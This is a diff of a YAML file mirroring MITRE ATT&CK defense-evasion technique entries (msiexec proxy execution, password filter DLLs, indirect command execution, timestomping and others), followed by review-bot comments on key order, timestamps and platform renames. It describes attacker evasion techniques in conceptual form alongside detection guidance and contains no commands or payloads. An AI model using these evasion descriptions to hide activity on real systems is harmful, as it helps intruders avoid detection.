- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2850,12 +2916,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -2881,7 +2946,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -2923,7 +2988,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -2965,7 +3029,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -2988,36 +3052,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -3041,22 +3080,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
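Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is removed at the end of this hunk and not re-added anywhere in the rebuilt object, while every other field deleted in the preceding hunk reappears here in a new key order. If dropping the field is intentional (an upstream removal), say so in the commit message. The wholesale key reordering also makes this two-hunk diff far noisier than the actual change (the `modified` date, version 2.0 to 2.1, spec version 3.2.0 and `revoked: false`); a stable key order in the generator would keep such diffs reviewable.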
@@ -3131,7 +3192,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3157,7 +3217,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3180,8 +3240,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
@@ -3277,65 +3335,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
+ Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
x_mitre_contributors:
- Matthew Demaske, Adaptforward
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ - Liran Ravich, CardinalOps
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
+ such as Sysmon, for events such as process creations that include or are resulting
+ from parameters associated with invoking programs/commands/files and/or spawning
+ child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ x_mitre_defense_bypassed:
+ - Static File Analysis
+ - Application Control
type: attack-pattern
id: attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e
created: '2018-04-18T17:59:24.739Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1202
url: https://attack.mitre.org/techniques/T1202
+ external_id: T1202
+ - source_name: Bleeping Computer - Scriptrunner.exe
+ description: Bill Toulas. (2023, January 4). Hackers abuse Windows error reporting
+ tool to deploy malware. Retrieved July 8, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-windows-error-reporting-tool-to-deploy-malware/
- source_name: Evi1cg Forfiles Nov 2017
- url: https://twitter.com/Evi1cg/status/935027922397573120
description: Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved
- January 22, 2018.
+ September 12, 2024.
+ url: https://x.com/Evi1cg/status/935027922397573120
- source_name: RSA Forfiles Aug 2017
- url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
description: Partington, E. (2017, August 14). Are you looking out for forfiles.exe
(if you are watching for cmd.exe). Retrieved January 22, 2018.
+ url: https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe
+ - source_name: Secure Team - Scriptrunner.exe
+ description: Secure Team - Information Assurance. (2023, January 8). Windows
+ Error Reporting Tool Abused to Load Malware. Retrieved July 8, 2024.
+ url: https://secureteam.co.uk/2023/01/08/windows-error-reporting-tool-abused-to-load-malware/
+ - source_name: SS64
+ description: SS64. (n.d.). ScriptRunner.exe. Retrieved July 8, 2024.
+ url: https://ss64.com/nt/scriptrunner.html
- source_name: VectorSec ForFiles Aug 2017
- url: https://twitter.com/vector_sec/status/896049052642533376
description: vector_sec. (2017, August 11). Defenders watching launches of
- cmd? What about forfiles?. Retrieved January 22, 2018.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)
-
- Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Indirect Command Execution
- x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
- such as Sysmon, for events such as process creations that include or are resulting
- from parameters associated with invoking programs/commands/files and/or spawning
- child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'Process: Process Creation'
- x_mitre_defense_bypassed:
- - Static File Analysis
- - Application Control
- x_mitre_attack_spec_version: 2.1.0
+ cmd? What about forfiles?. Retrieved September 12, 2024.
+ url: https://x.com/vector_sec/status/896049052642533376
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1202
atomic_tests: []
T1140:
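Review bot: the substantive changes to T1202 are the Scriptrunner.exe sentence, the four new references (Bleeping Computer, Secure Team, SS64 and the x.com URL updates), the added contributor and the version bump 1.1 to 1.2, but the hunk rewrites the whole object because the key order changed. As with T1556.002 above, emitting keys in a fixed order would shrink this to the handful of lines that actually changed and make the citation additions easy to verify against the `external_references` block.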
@@ -3402,22 +3470,24 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1140
atomic_tests: []
T1562:
technique:
- modified: '2023-10-20T16:43:53.391Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Impair Defenses
- description: |-
+ description: |+
Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
- Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+ Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
- Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Jamie Williams (U ω U), PANW Unit 42
+ - Liran Ravich, CardinalOps
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.
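Review bot: the block scalar indicator for the T1562 description changes from `|-` to `|+`, which keeps every trailing newline of the upstream text, so the value now ends in whatever blank lines upstream happens to have; the neighbouring descriptions in this file all use `|-`. Unless a consumer depends on the trailing newline, normalise the emitter to `|-` so the diff only reflects the merged second paragraph and the new `(Citation: Google Cloud Mandiant UNC3886 2024)`.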
@@ -3426,15 +3496,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Office 365
- IaaS
- Linux
- macOS
- Containers
- Network
- x_mitre_version: '1.5'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'File: File Modification'
- 'Cloud Service: Cloud Service Disable'
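Review bot: `Office 365` is removed from `x_mitre_platforms` and replaced by `Identity Provider` and `Office Suite` (version `1.5` to `1.6`); the same rename drops `Office 365` and `Google Workspace` from T1070.008 (`@@ -3672,9 +3744,8 @@`) and T1550 (`@@ -4671,12 +4818,12 @@`) later in this diff. Any per-platform index derived from this file and keyed on the old names will stop listing these techniques, so those artefacts need regenerating in the same change.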
@@ -3472,15 +3544,17 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562
external_id: T1562
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Emotet shutdown
description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1562
atomic_tests: []
T1055.003:
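Review bot: the new `Google Cloud Mandiant UNC3886 2024` reference has a leading space in its description string (`" Punsaen Boonyakarn, ...`), which none of the other descriptions carry. Since the text is taken from upstream, either strip leading whitespace in the generator or fix it at the source so the quoting style stays consistent.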
@@ -3504,7 +3578,7 @@ defense-evasion:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
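Review bot: the `modified` timestamp for T1055.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-18T12:22:50.800Z`, and the same regression appears for T1055, T1205, T1218.002, T1599.001 and T1553.003 further down. The old values share the `14:00:00.188Z` / `14:49:39.188Z` suffix, which looks bulk-stamped, so the new values are plausibly the real per-object times, but confirm the generator is not reading an older dataset before merging.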
@@ -3552,13 +3626,11 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1036:
technique:
- modified: '2024-03-08T17:00:59.133Z'
+ modified: '2024-10-16T20:10:38.450Z'
name: Masquerading
description: |-
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
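Review bot: T1055.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0`, and nothing in this diff re-emits an `x_mitre_attack_spec_version` for it, unlike T1562 above where the field is moved rather than removed. The same happens for T1218.002 (`@@ -4559,8 +4709,6 @@`) and T1599.001 (`@@ -4622,12 +4770,10 @@`), while T1553.003 (`@@ -4869,35 +5014,34 @@`) keeps `x_mitre_attack_spec_version: 2.1.0`; if the field is expected on every technique, these objects are now inconsistent.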
@@ -3574,7 +3646,7 @@ defense-evasion:
- Felipe Espósito, @Pr0teus
- Elastic
- Bartosz Jerzman
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
- 'Process: Process Creation'
- 'Image: Image Metadata'
- 'Scheduled Job: Scheduled Job Metadata'
+ - 'User Account: User Account Creation'
- 'File: File Metadata'
- 'Scheduled Job: Scheduled Job Modification'
- 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
external_id: T1036
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Elastic Masquerade Ball
description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036
atomic_tests: []
T1070.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:43:56.839Z'
name: 'Email Collection: Mailbox Manipulation'
description: "Adversaries may modify mail and mail application data to remove
evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.008
atomic_tests: []
T1055:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:45.488Z'
name: Process Injection
description: "Adversaries may inject code into processes in order to evade process-based
defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1055
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218:
technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218
atomic_tests: []
T1070.006:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Romain Dumont, ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
- type: attack-pattern
- created: '2020-01-31T12:42:44.103Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1070.006
- url: https://attack.mitre.org/techniques/T1070/006
- - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
- description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
- of Anti-Forensics Techniques. Retrieved June 3, 2016.'
- source_name: WindowsIR Anti-Forensic Techniques
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-09-30T15:14:56.021Z'
name: 'Indicator Removal on Host: Timestomp'
description: |-
- Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+ Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+ Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+ Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+ Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
+ x_mitre_contributors:
+ - Romain Dumont, ESET
+ - Mike Hartley @mikehartley10
+ x_mitre_deprecated: false
x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
It may be possible to detect timestomping using file modification monitoring
that collects information on file handle opens and can compare timestamp values.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Process: OS API Execution'
- 'File: File Modification'
- 'File: File Metadata'
+ - 'Command: Command Execution'
x_mitre_defense_bypassed:
- Host forensic analysis
- x_mitre_permissions_required:
- - root
- - SYSTEM
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+ created: '2020-01-31T12:42:44.103Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1070/006
+ external_id: T1070.006
+ - source_name: WindowsIR Anti-Forensic Techniques
+ description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+ of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+ url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+ - source_name: Inversecos Timestomping 2022
+ description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+ Detection – NTFS Forensics. Retrieved September 30, 2024.'
+ url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+ - source_name: Magnet Forensics
+ description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+ with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+ url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+ - source_name: Double Timestomping
+ description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+ ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+ url: https://x.com/matthewdunwoody/status/1519846657646604289
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1070.006
atomic_tests: []
T1620:
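Review bot: the T1070.006 description now documents the `$SI` versus `$FN` timestamp mismatch and "double timestomping", and adds `'Process: OS API Execution'` and `'Command: Command Execution'` as data sources, but `x_mitre_detection` is unchanged and still only mentions generic forensic techniques and file handle monitoring; if this file mirrors upstream, that gap should be raised there. Two smaller points from the same hunk: the `Double Timestomping` citation ends with a doubled period (`Stay sharp out there..`), and the new contributor line `Mike Hartley @mikehartley10` does not follow the `Name, Organisation` form used by the entry above it.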
